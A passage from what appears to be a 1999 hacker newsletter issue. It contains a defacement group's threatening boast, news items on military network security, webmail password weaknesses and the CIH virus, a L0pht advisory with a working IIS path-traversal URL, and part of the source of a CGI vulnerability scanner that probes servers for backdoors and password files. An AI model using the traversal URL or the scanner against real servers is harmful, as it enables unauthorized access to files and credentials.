23.1 Statement from F0rpaxe (associated with IL)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
F0rpaxe Speaks Out
contributed by Esoterica
Yesterday HNN reported that the FBI had raided Iron Lungs (IL) and possibly dk and had taken them into
custody for questioning. One of the groups that IL has been affiliated with is F0rpaxe. This Portuguese
group has claimed responsibility for defacing numerous military and government web servers. HNN has
received an exclusive statement from F0rpaxe that details what they are about and what they aim to do.
F0rpaxe Speaks Out
From HNN
Ed Note: HNN was asked to edit this statement and
correct for grammar and spelling. We decided it was best
to present the words exactly as they where received so
as to not confuse their meaning.
F0rpaxe
People from all over are now realizing what F0rpaxe is capable. The name is spreading on
like fire. F0rpaxe is a Portuguese group which had been working on the shadow for some
years. All this is now changing. Along time Portuguese Institutions tried to kept us hiden..
WE had been opressed... Our freedom was taken way. Our servers were shutdown by
Portuguese Enteties and our public connection to the cyberworld was deleted... F0rpaxe
decides to fight against all this injustice.
We breaked in some Portuguese servers in wich Portuguese Airforce, Portuguese gov
servers etc.. Soon we realize that security in Portugal was even worst than we thought. WE
start hacking more important servers like US military servers and gov servers and mostly
NASA servers. Along time F0rpaxe had been connected to HCV since m1crochip and I-L
were friends. When I-L started to knew about all the hacks we were performing he asked to
enter to the group. He wanted to help us.Soon we started our mission..
Our main goal is to show the Portuguese government that they can�t manipulate us.
Besides this we don�t have motives.... and for what matters to NASA they can launch their
systems to MARS because on earth they are vulnerable like everyone. FBI can burn in Hell if
he wants too. We will continue with our current missions either if FBI likes it or not.
Recently F0rpaxe had been the responsable group for breaking into important military
servers, gov servers and Nasa servers among other who hadn�t been reported or that are
still being explored.. Military Databases and other confidencial info had been copyed. We
have info and knowledge to get down a major military network in seconds so if FBI wants to
get burned he can sit down and wait and we will show them..
Recently I-L had been acussed for the breakin of several Servers. I as founder of Forpaxe
declare that the recent hacks had been only executed by F0rpaxe. THis makes us both
responsable. I-L as member of F0rpaxe is involved but not tottaly. As leader of F0rpaxe
i�m the main responsable. I�m telling you this because FBI can�t get their hands on us and
also I-L is being targeted of injustice. Don�t accuse a man who is trying to help us out.
WE (m1crochip / I-L) are a team.
Forpaxe Technologies Inc.
m1crochip
@HWA
24.0 SIPRNET to be made more secure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SIPRNET to Made Even More Secure
From HNN http://www.hackernews.com/
contributed by l3inad
In an effort to increase security on the DODs Secret
Internet Protocol Routing Network, (SIPRNET)
information access will be restricted. While SIPRNET
allegedly has no direct connection to the internet DOD
would like to further protect its classified information
network from internal security threats. It hopes that by
compartmentalizing access to information and only
allowing access to information required to preform a job
function that the network can be made more secure. (It
is interesting that information like this gets out to the
general public. It is surprising that DOD publicly explains
its defense posture for its most secure systems.)
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0503/web-pki-5-5-99.html
MAY 5, 1999 . . . 16:25 EDT
DOD taking steps to secure secret network
further
BY DANIEL VERTON (dan_verton@fcw.com)
SALT LAKE CITY -- Looking to protect its classified information network
from internal security threats, the Defense Department is considering a new
policy that will limit strictly network users' access to information.
DOD uses the Secret Internet Protocol Routing Network, or SIPRNET, as a
secure intranet for sharing information classified as secret. Though SIPRNET
provides no direct connections to the Internet, some DOD officials worry that
giving personnel access to too much information could pose a security risk.
The new policy would create "communities of interest" within the network, in
which users would have access only to information required by their work.
"You don't want to give anybody access to all of your [organization's]
information," said Richard Hale, an information assurance engineering
executive with the Defense Information Systems Agency. "We are concerned
that 500,000 of our closest friends are looking at our secrets," said Hale,
referring to the approximate number of government personnel who have
access to some sort of classified information.
Speaking at the Software Technology Conference here, Hale said senior
DOD officials are expected to brief Deputy Secretary of Defense John Hamre
today on the possibility of including the new policy as part of DOD's overall
public-key infrastructure security initiative.
PKI solutions combine encryption, digital certificates and other technologies
to authenticate a user's identity and to ensure that data and transactions are
not tampered with during transmission over the Internet. DOD announced
plans last month to use PKI solutions to secure both internal and external
communications.
But PKI "doesn't solve anything itself," said Hale. Rather, because many of
today's commercial security products "are not that good," DOD needs to
devise a common set of policies governing both access and standards, he
said.
In addition, Hale said the department needs to address the "hodgepodge" of
Internet connections and protection policies that make up the DOD security
architecture and process, which he described as "just a mess." As a solution,
Hale recommended formulating a set of standard policies that spell out what
type of information will be allowed to enter and leave DOD networks.
Hale said the modern way of dealing with adversaries, whether cyber-based
or otherwise, remains "essentially unchanged" since the construction of the
Great Wall of China, when nations erected stone embankments to protect
their citizens against invading forces. "I do not think this can continue if we're
really going to be serious about fighting wars using [COTS systems]," he said.
@HWA
25.0 U.S Army to teach "Information Survival"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
US Army to Teach "Information Survival"
From HNN http://www.hackernews.com/
contributed by l3inad
This fall the US Army will offer a graduate-level course
on information systems survivability. The course will
teach engineers to develop systems capable of surviving
any kind of technical glitch or network attack. The
14-week course will be beemed via satellite to 16
different locations and will be offered through the
University of Maryland as an online, distance-learning
initiative sponsored by the Army Research Laboratory in
Adelphi, Md.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0503/web-army-5-5-99.html
MAY 5, 1999 . . . 10:48 EDT
Army to offer 'information survival' training
BY DANIEL VERTON (dan_verton@fcw.com)
SALT LAKE CITY -- The Army this fall plans to offer an online
graduate-level training course on information systems survivability, teaching
engineers to develop systems capable of surviving any kind of technical glitch
and network attack.
The new 14-week Infosurv course will be offered through the University of
Maryland as an online, distance-learning initiative sponsored by the Army
Research Laboratory in Adelphi, Md. During the course, students with a basic
engineering background will build on their education with instruction on
reliability, security and performance risks that must be addressed early in the
life cycle of an information system.
According to Lt. Col. Paul Walczak, senior computer scientist at the Army
Research Laboratory, the concept of Infosurv has been around for about 10
years, growing out of research conducted at the Army Research Laboratory.
Survivability, Walczak said, can best be defined as a system's ability to
withstand hardware faults, software flaws, network attacks by hackers and
electromagnetic interference. When one of these types of failures brings a
system or a portion of a system down, the rest of the information infrastructure
must be capable of operating, he said.
"This is a serious attempt by the Army Research Lab to institutionalize the
concept," Walczak said. Until now, reliability, survivability and security have
been features that systems developers have "bolted on" after the development
process started, he said. The goal is to build these requirements into the
system design before development work begins, he said.
The Army plans to transmit live courses each Thursday from a lecture room
on the College Park, Md., campus to as many as 16 satellite locations. "We
plan to beam this course out to as many sites as are interested in it," said
Walczak, who noted that the University of Tennessee, Pennsylvania State
University and Harvard University also have expressed interest in taking part
in future courses.
Peter Neumann, principal scientist at the Computer Science Laboratory at
SRI International and the principal investigator for Infosurv research, will be
the primary instructor for the course. The course will act as the core course in
a new four-course masters-level certificate program in survivable systems, and
it also can be used as credit toward a regular degree program.
@HWA
26.0 TAKEDOWN gets ready for TAKEOFF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Takedown Propaganda has Begun
From HNN http://www.hackernews.com/
contributed by Arik
TAKEDOWN, a movie produced by Millennium Films and
Dimension Films and which will be released by Miramax is
already getting reviews published. The film is claiming to
be based on the true story of Kevin Mitnick. This
'review' is nothing more than an explanation of the plot
with no commentary on whether the movie is good or
bad. There is a discussion board about this review though.
Aint-It-Cool-News
http://www.aint-it-cool-news.com/display.cgi?id=3554
Our Pitbull looks at TAKEDOWN
Here's our first look at TAKEDOWN a film about... well, shucks.. Pitbull
here goes into that for ya him own self, so why should I. If anyone here's
any additional info on this project let me know, alrighty? Cool. Here's our
vicious pup...
Woof! It's The Pitbull, back online with a preview of the new jacked-in, cybercrime, hacker thriller
TAKEDOWN, produced by Millenium Films and Dimension Films and which will be released by Miramax.
TAKEDOWN, directed by Joe Chappelle (PHANTOMS) is based on the true story of the trackdown, and
eventual arrest of superhacker Kevin Mitnick. Played by Skeet Ulrich, Mitnick is a master at breaking into
computer networks and stealing files. He believes that the First Amendment should cover all information and that
anyone with a modem is entitled to free access. In the course of his hacking, he steals files from expert computer
security consultant Tsutomoto Shimomura (Russell Wong). Included in the files is a super worm/virus called
"Contempt", which enables the user to breakdown the security programs and firewalls of any computer network.
The story becomes a cross country race against time and a battle of wits between Mitnick, trying to crack
Contempt's code, and Shimomura and the FBI's efforts to track Mitnick down and stop him before he can upload
the program to the internet.
Also in the cast is Angie Featherstone as Shimomura's computer savvy girlfriend, and Donal Logue as Mitnick's
friend and ally Alex Lowe. This could be the film that finally does away with the dweeb image of hackers and
shows the computer geek as a freedom fighting hero and protector of our liberties. Hey, a couple of these
characters actually have flesh and blood girlfriends!
Well, it's time to chase some cats and scare the postman, so until next time, Woof!
@HWA
27.0 Free Email Vulnerable
~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Free EMail Vulnerable
contributed by Code Kid
A little late but the Internet Security Advisors Group has
found in a recent security probe that free e-mail
services such as Microsoft's Hotmail, YahooMail and
Excite Mail failed to provide a basic security. President
of ISAG, Ira Winkler, says that this lack of features
makes it possible for "Hackers" to read your email.
NEW SCIENTIST
http://www.eurekalert.org/releases/ns-fes050499.html
Free E-mail Services Are Vulnerable To Hackers
Free Web-based e-mail services are vulnerable to hackers, according to an
analysis by the Internet Security Advisors Group, a consultancy in Severna
Park, Maryland. In its security probe, ISAG focused on the three biggest and
most firmly established Web-based free e-mail services: Microsoft's Hotmail,
YahooMail and Excite Mail. It found that all three failed to provide a basic
security feature that helps keep hackers out.
The major mistake made by all the service providers was to allow users an
unlimited number of attempts to log on, rather than locking them out after a
couple of attempts if they got the password wrong. This, says Ira Winkler,
president of ISAG, makes it possible for hackers to guess a password by
brute force-using what is known as an automated dictionary attack, which tries
vast numbers of different passwords until the correct one is found.
This, Winkler says, is a basic information security issue the service providers
should have got right. In addition, ISAG found that many Web-based e-mail systems
also fail to encrypt their passwords when they are sent over the Net, making
them easy prey for hackers to intercept. Some hackers collect passwords, logging
into e-mail accounts and sending bogus messages.
Last week, Hotmail tightened its security in response to ISAG's findings. Its
log-in protocol now incorporates a slight delay when the password is entered.
For each wrong attempt the delay increases, making any automated attack take an
unfeasibly long time. "There's no impact on members who log in successfully," says
Laura Norman, a project manager at Hotmail, "but this should deter potential
dictionary attacks." Yahoo has also made changes to its password security system and
Excite is believed to be considering the matter.
###
Author: Duncan Graham-Rowe
New Scientist issue 8th May 1999
28.0 Are consumers worried about online security?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Most Consumers not Concerned with Online Security
contributed by W3rDnA
Are consumers really worried about loosing their credit
card numbers online? They shouldn't be, considering
that your only liable for $50 worth of fraudulent
charges. What consumers should be worried about is
invasions of privacy while shopping online.
Fox News
http://www.foxnews.com/js_index.sml?content=/scitech/050599/security.sml
The Detroit News
http://detnews.com/1999/technology/9905/05/05050158.htm
The Builder Online
http://builder.hw.net/news/1999/may/05/shop05.htx
Fox News
Online Shoppers Willing to Accept Security Risk
10.29 a.m. ET (1429 GMT) May 5, 1999
By Andrew Hay REUTERS
NEW YORK � Sean Michael says he had his credit card number stolen online
and used in a fraudulent shopping spree, but it hasn't stopped him from trawling
the Web in search of bargains.
"The prices are so good, it's worth the risk," Michael, 25, said Monday as he
took a break outside the Manhattan skyscraper where he works as a financial
adviser.
Michael is among online shoppers willing to face certain security risks to obtain
products ranging from dress shirts to airline tickets at steep discounts.
The perennial issue of e-commerce security sprang up again recently with reports
that a 13-year-old boy had placed $3.1 million in bids on merchandise advertised
on the Internet auction site eBay, including $1.2 million for a medical office in
Florida. All the bids were fictitious.
Industry analysts said online shopping risks vary greatly, often based on the size
of the retailer, but in general typing your credit card number while online is no
more dangerous than giving it to a waiter or a telephone operator.
Michael's credit card problems followed one of his first online buys seven to eight
months ago. Someone used his card for a number of fraudulent purchases after he
ordered some dress shirts and a suit from Paul Fredrick, an established direct
seller of men's apparel, which has sold its wares online since 1990.
Paul Fredrick spokesman Jeff Giesener said the Fleetwood, Pa., company has
strong encryption, or scrambling, software installed on its computers and he was
not aware of any reported cases of credit card fraud among its 30,000 online
customers.
"I don't know why he's linking it to us; if you go to a restaurant, and a receipt
goes in the garbage, it can be used fraudulently," Giesener said. "I think it's riskier
offline."
Michael said he was not held liable for any of the fraudulent buys and continues to
be a regular customer at http://www.paulfredrick.com.
Recent online fraud and hacker attacks show both leading Internet companies
and small startups can fall prey to security breaches. In a much-publicized case,
bidders at eBay Inc. and another online auction house, Up4Sale, fell victim to
fraud when goods they bought were not delivered.
Gartner Group analyst Chuck Shih said statistics generated by Visa indicated
credit card fraud was as likely to occur online as offline.
But slip-ups are most likely to take place at smaller, newer Web retail
establishments racing to the Web, Shih said. In their rush to get online and
establish their brand, these outfits often sidestep security issues in a bid to be first
to market, he said.
Credit card fraud remains so relatively rare that many companies find it easier to
reimburse customers than to go through costly investigations to determine whether
the fraud originated from their site, Donna Hoffmann, an Internet specialist at
Vanderbilt University in Nashville, Tenn., said in a telephone interview.
"When someone gets hurt seriously enough, then people are going to take a step
back and look at security," Hoffman said in a telephone interview. "Right now, the
security is not that sophisticated."
Often, security breaches are merely the result of savvy hackers capitalizing on
human errors.
Improperly installed and maintained security software can put any online retailer
at risk of credit card fraud. Recent cases have shown that so-called "shopping
cart" technology used by some Web retailers could expose credit card numbers
and other data to the public if not installed properly, Shih said.
Hoffmann said smaller operations often lack the financial and human resources to
monitor their security software continually.
One way to increase security is to make customers go through a longer series of
mouse clicks. But retailers hate sacrificing speed and giving up customers who
find ordering too slow or boring and may think twice about impulse buys.
Ultimately, combating fraud lies in the hands of the cyber-consumer.
Online shoppers can use encryption technology, which scrambles data sent over
the Internet, to protect credit card numbers in online transactions or can call
1-800 numbers to give the credit card number to a person after seeing something
online.
Bob, the 35-year-old founder of a Seattle Internet company, who asked that his
last name not be used, said he takes such security steps when he can but that it
doesn't keep him from buying when they're not available.
"It's a trade-off between how much you'll save versus security," said Bob, who
has used the Web to get discounts of up to 50 percent on plane tickets. "I've had
no problems so far."
@HWA
29.0 Hotmail Passwords Stolen
~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Hotmail Passwords Stolen
contributed by Laup
A java script password-stealing application is known to
have snared at least 10 users passwords and is the first
time such a hole has been known to have been used to
actually steal passwords. This particular hole involved
an emailed attachment with a Web page link. A script
running on the attacker's Web page then negotiated a
request to change the password with the Hotmail
server, locking the user out of the account and giving
the attacker access to it.
C|Net
Malicious hacker steals Hotmail passwords
By Paul Festa
Staff Writer, CNET News.com
May 6, 1999, 12:55 p.m. PT
URL: http://www.news.com/News/Item/0,4,36213,00.html
Hotmail password-stealing exploits are no longer the sole province of bug-hunting, ethical
hackers.
Microsoft's MSN Hotmail said it has implemented a patch to thwart a JavaScript exploit that
snared the passwords of about ten users. Although Hotmail has faced numerous similar exploits
in the past, they were merely demonstrations crafted by security-minded programmers anxious to
expose security holes before they were exploited for real.
This one appears to be the first known instance in which users actually lost their Hotmail
passwords.
"We're not aware of any [previous] passwords successfully stolen in this type of exploit," said
Hotmail product manager Laura Norman.
The Trojan horse password-stealing scheme involved an emailed attachment with a Web page link.
A script running on the attacker's Web page then negotiated a request to change the password with
the Hotmail server, locking the user out of the account and giving the attacker access to it.
Hotmail was not more specific on the mechanics of the script or how the hole was patched. Norman
did say Hotmail would step up its education efforts to users regarding the safety of opening
attachments.
"We are increasing our messaging to users about only opening attachments from trusted sources," she
said.
Trojan horses consist of executable content that acts in a way other than the user expects it to.
JavaScript is a scripting language developed by Netscape Communications for authoring Web site actions
that do not require user interaction; pop-up windows, for instance, are commonly authored with JavaScript.
JavaScript is unrelated to Java, Sun Microsystems' platform-independent computer programming language.
JavaScript has been the tool of choice for numerous bug hunters and hackers because of its ability to
carry out actions on the user's computer without his or her consent or knowledge. For this reason, many
security-conscious Web surfers disable the technology when surfing the Web.
The perpetrator's Web site was hosted by free home page provider Tripod, which is owned by Lycos. Norman
said that Tripod was "very cooperative," but she declined to state whether the firms were taking action
against the password thief.
@HWA
30.0 Microsoft IIS 4.0 vulnerability found
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Microsoft IIS 4.0 Vulnerability Found
contributed by Weld Pond
L0pht Heavy Industries has found a problem with IIS 4.0
and the ASP sample file, showcode.asp. This sample file
is designed to view the contents of the sample .asp files
that come with the software. Unfortunatley due to
weak security this file can allow any remote user to
view any text file on the web server. This has the
potential to put transaction logs, credit card numbers,
and other customer information from e-commerace
servers at risk
L0pht Heavy Industries
http://www.l0pht.com
L0pht Security Advisory
-------------
URL Origin: http://www.l0pht.com/advisories.html
Release Date: May 7th, 1999
Application: Microsoft IIS 4.0 Web Server
Severity: Web users can view ASP source code and other sensitive
files on the web server
Author: weld@l0pht.com
Operating Sys: Microsoft NT Server 4.0
--------------
I. Description
Internet Information Server (IIS) 4.0 ships with a set of sample files
to help web developers learn about Active Server Pages (ASP). One of
these sample files, showcode.asp, is designed to view the source
code of the sample applications via a web browser. The showcode.asp
file does inadequate security checking and allows anyone with a web
browser to view the contents of any text file on the web server. This
includes files that are outside of the document root of the web
server.
Many ecommerce web servers store transaction logs and other customer
information such as credit card numbers, shipping addresses, and
purchase information in text files on the web server. This is the
type of data that could be accessed with this vulnerability.
The L0pht would like to thank Parcens for doing the initial research on
this problem.
II. Details
The showcode.asp file is installed by default at the URL:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp
It takes 1 argument in the URL, which is the file to view. The format of
this argument is:
source=/path/filename
So to view the contents of the showcode.asp file itself the URL would be:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp
This looks like a fairly dangerous sample file. It can view the contents
of files on the system. The author of the ASP file added a security check
to only allow the viewing of the sample files which were in the '/msadc'
directory on the system. The problem is the security check does not test
for the '..' characters within the URL. The only checking done is if the
URL contains the string '/msadc/'. This allows URLs to be created that
view, not only files outside of the samples directory, but files anywhere
on the entire file system that the web server's document root is on.
For example, a URL that will view the contents of the boot.ini file, which
is in the root directory of an NT system is:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini
This URL requires that IIS 4.0 was installed in its default location.
III. Solution
For production servers, sample files should never be installed so delete
the entire /msadc/samples directory. If you must have the showcode.asp
capability on development servers the showcode.asp file should be modified
to test for URLs with '..' in them and deny those requests.
For specific questions about this advisory, please contact
weld@l0pht.com
---------------
For more L0pht (that's L - zero - P - H - T) advisories check out:
http://www.l0pht.com/advisories.html
---------------
@HWA
31.0 [ISN] More on CIH , college student receives demerit but no other punishment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: 7Pillars Partners <partners@sirius.infonex.com>
Taiwan college identifies computer virus author
TAIPEI, Taiwan (AP) - A former computer engineering student was
identified by his college today as the author of the Chernobyl virus
- the menace that caused hundreds of thousands of computer meltdowns
around the world this week.
The Tatung Institute of Technology had punished Chen Ing-hau last
April when the virus he wrote as a student began to cause damage in
an inter-college data system, according to Lee Chee-chen, the
institute's dean of student affairs.
Chen, who was a senior at the time, was given a demerit but not
expelled.
The Chernobyl virus is known in Taiwan as the CIH, using Chen's
initials.
The college did not mete out a more severe punishment because Chen
had warned fellow students not to spread the virus, Lee said. Chen
did not come up with an anti-virus program, Lee said.
Lee said he was not sure how the virus ended up causing so much
destruction a year later.
Chen graduated from the college last summer and now is serving
Taiwan's two-year compulsory military service, Lee said.
Officials of the Bureau of Criminal Investigation said they would
seek permission to question Chen.
The unusually destructive virus - timed to strike on April 26, the
13th anniversary of the Chernobyl nuclear disaster - tries to erase a
computer's hard drive and write gibberish into its system settings to
prevent the machine from being restarted.
Turkey and South Korea each reported 300,000 computers damaged
Monday, and there were more elsewhere in Asia and the Middle East.
Fewer than 10,000 of the 50 million computers in the United States
were affected.
Copyright 1999 Associated Press. All rights reserved. This material
may not be published, broadcast, rewritten, or redistributed.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
32.0 [ISN] Taiwan virus suspect free on lack of victims
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/TECH/computing/9904/30/virus.computer.reut/index.html
Taiwan virus suspect free on lack of victims
April 30, 1999
Web posted at: 11:59 a.m. EDT (1559 GMT)
TAIPEI, Taiwan (Reuters) -- Investigators said on Friday a Taiwan hacker
admitted creating the Chernobyl virus that ravaged computers worldwide but
said a lack of any local plaintiffs made it difficult to charge him.
Police said Chen Ing-hau, a 24-year-old information engineer now serving
mandatory military service, was questioned but not charged and the probe
hinged on finding victims.
"He's not a criminal here as long as no one registers a complaint," a
Taipei police spokeswoman said.
"All we know about problems with the virus is what we've seen in foreign
news reports."
Chen's rogue program hit hardest in countries with weak anti-virus
defenses, gumming up hundreds of thousands of computers in South Korea,
Turkey and China and thousands in India, Bangladesh, the Mideast and
elsewhere.
Police said no infections had been reported in Taiwan.
Chen was questioned on suspicion of intentionally spreading a computer
virus, a crime that carries a possible three-year prison term, and could
be charged if victims come forth.
A bashful Chen, in brief comments after he was released, expressed remorse
and offered to help victims remove the virus from their computers.
Authorities said Chen created the virus while studying at Tatung Institute
of Technology, which had disciplined him a year ago after learning about
the computer program, and did not pursue the matter further with
authorities.
Dubbed Chernobyl because it strikes on anniversaries of the April 26,
1986, Soviet nuclear disaster, the virus is known to experts as CIH --
which Chen acknowledged were his initials.
Chernobyl and other CIH variants are among the most damaging viruses of
recent years, less widespread than the e-mail replicator virus "Melissa"
that swamped Internet servers around the world in April but far more
vicious.
Chernobyl/CIH employs a "spacefilling" technique that clogs up a
computer's hard-disk storage system, crashing most systems and in many
cases making restart impossible.
Western virus experts first traced Chernobyl/CIH to Taiwan in June 1998
and said it had spread worldwide via the Internet and other networks
within a week.
Chernobyl's virulence and Taiwan's seemingly lenient handling of its
author have kindled a debate about how the world should combat viruses.
In the United States, where the Melissa virus's spewing of duplicate
e-mail messages forced many firms to shut down their overtaxed computer
networks, alleged author David Smith faces the possibility of 40 years in
prison if convicted.
ZDNet writer Robert Lemos, in an Internet dispatch, said Taiwan's Chen
"was not prosecuted, but merely reprimanded and given a demerit" by his
school.
"The immense differences in punishment illustrate a large rift in
perceptions over the seriousness of computer viruses," Lemos wrote, adding
that while "Melissa was essentially benign, CIH was deadly to some
computers."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
33.0 cgichk 1.34c modification adds port numbers by 'Joe Hacker'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* ---------------------------------------------------------------------- */
/* CGI scanner v1.33, m0dify and recode by su1d sh3ll //UnlG 1999 */
/* Tested on Slackware linux with kernel 2.0.35;2.0.36; */
/* FreeBSD 2.2.2-3.1;IRIX 5.3 */
/* Source c0de by [CKS & Fdisk] */
/* Gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/
/* el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX , */
/* hypoclear of lUSt */
/* Fuck to: www.hackzone.ru , HDT... CHC fuck u 2 llamaz-scr1pt k1dd1ez */
/* hey! v0rt-fu if u kewl programmer u must write u own proggi, */
/* and stop modify th1s scanner...(i can do it better and CKS ;) */
/* hmm, remember if u can add 2 CGi to scanner u can't change */
/* real Version number and name.....better go read 'C' Bible ;-) */
/* c0m1ng s00n: hmmm.... i forgot 8-) again forgot... :-) */
/* -----------------------------------------------[02:30 04.05.99 UnlG]- */
/* codex@bogus.net // added misc TCP port support 06.05.99 */
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int sock,debugm=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin;
char cgibuff[1024];
char *buff[100]; /* Don't u think 100 is enought? ;-)*/
char *cginame[100]; /* Don't u think 100 is enought? */
int myport = 80;
buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n";
/* v0rt-fu when u modify source, check this first line.... that's my 8-) */
buff[2] = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n";
buff[3] = "GET /cgi-bin/phf HTTP/1.0\n\n";
buff[4] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
buff[5] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
buff[6] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n";
buff[7] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
buff[8] = "GET /cgi-bin/handler HTTP/1.0\n\n";
buff[9] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
buff[10] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
buff[11] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
buff[12] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
buff[13] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
buff[14] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
buff[15] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
buff[16] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
buff[17] = "GET /cgi-bin/www-sql HTTP/1.0\n\n";
buff[18] = "GET /cgi-bin/view-source HTTP/1.0\n\n";
buff[19] = "GET /cgi-bin/campas HTTP/1.0\n\n";
buff[20] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n";
buff[21] = "GET /cgi-bin/glimpse HTTP/1.0\n\n";
buff[22] = "GET /cgi-bin/man.sh HTTP/1.0\n\n";
buff[23] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n";
buff[24] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n";
buff[25] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n";
buff[26] = "GET /cgi-bin/jj HTTP/1.0\n\n";
buff[27] = "GET /cgi-bin/info2www HTTP/1.0\n\n";
buff[28] = "GET /cgi-bin/files.pl HTTP/1.0\n\n";
buff[29] = "GET /cgi-bin/finger HTTP/1.0\n\n";
buff[30] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n";
buff[31] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n";
buff[32] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n";
buff[33] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n";
buff[34] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n";
buff[35] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n";
buff[36] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n";
buff[37] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n";
buff[38] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n";
buff[39] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n";
buff[40] = "GET /_vti_pvt/shtml.dll HTTP/1.0\n\n";
buff[41] = "GET /_vti_pvt/shtml.exe HTTP/1.0\n\n";
buff[42] = "GET /cgi-dos/args.bat HTTP/1.0\n\n";
buff[43] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n";
buff[44] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n";
buff[45] = "GET /scripts/CGImail.exe HTTP/1.0\n\n";
buff[46] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n";
buff[47] = "GET /scripts/fpcount.exe HTTP/1.0\n\n";
buff[48] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
buff[49] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
buff[50] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";
buff[51] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n";
buff[52] = "GET /search97.vts HTTP/1.0\n\n";
buff[53] = "GET /carbo.dll HTTP/1.0\n\n"; /* we have at archive about 70 CGi ,
rule? ;-) */
cginame[1] = "UnlG - backd00r ";
cginame[2] = "THC - backd00r ";
cginame[3] = "phf..classic :) ";
cginame[4] = "Count.cgi ";
cginame[5] = "test-cgi ";
cginame[6] = "nph-test-cgi ";
cginame[7] = "php.cgi ";
cginame[8] = "handler ";
cginame[9] = "webgais ";
cginame[10] = "websendmail ";
cginame[11] = "webdist.cgi ";
cginame[12] = "faxsurvey ";
cginame[13] = "htmlscript ";
cginame[14] = "pfdisplay ";
cginame[15] = "perl.exe ";
cginame[16] = "wwwboard.pl ";
cginame[17] = "www-sql ";
cginame[18] = "view-source ";
cginame[19] = "campas ";
cginame[20] = "aglimpse ";
cginame[21] = "glimpse ";
cginame[22] = "man.sh ";
cginame[23] = "AT-admin.cgi ";
cginame[24] = "filemail.pl ";
cginame[25] = "maillist.pl ";
cginame[26] = "jj ";
cginame[27] = "info2www ";
cginame[28] = "files.pl ";
cginame[29] = "finger ";
cginame[30] = "bnbform.cgi ";
cginame[31] = "survey.cgi ";
cginame[32] = "AnyForm2 ";
cginame[33] = "textcounter.pl ";
cginame[34] = "classifields.cgi";
cginame[35] = "environ.cgi ";
cginame[36] = "service.pwd ";
cginame[37] = "users.pwd ";
cginame[38] = "authors.pwd ";
cginame[39] = "administrators ";
cginame[40] = "shtml.dll ";
cginame[41] = "shtml.exe ";
cginame[42] = "args.bat ";
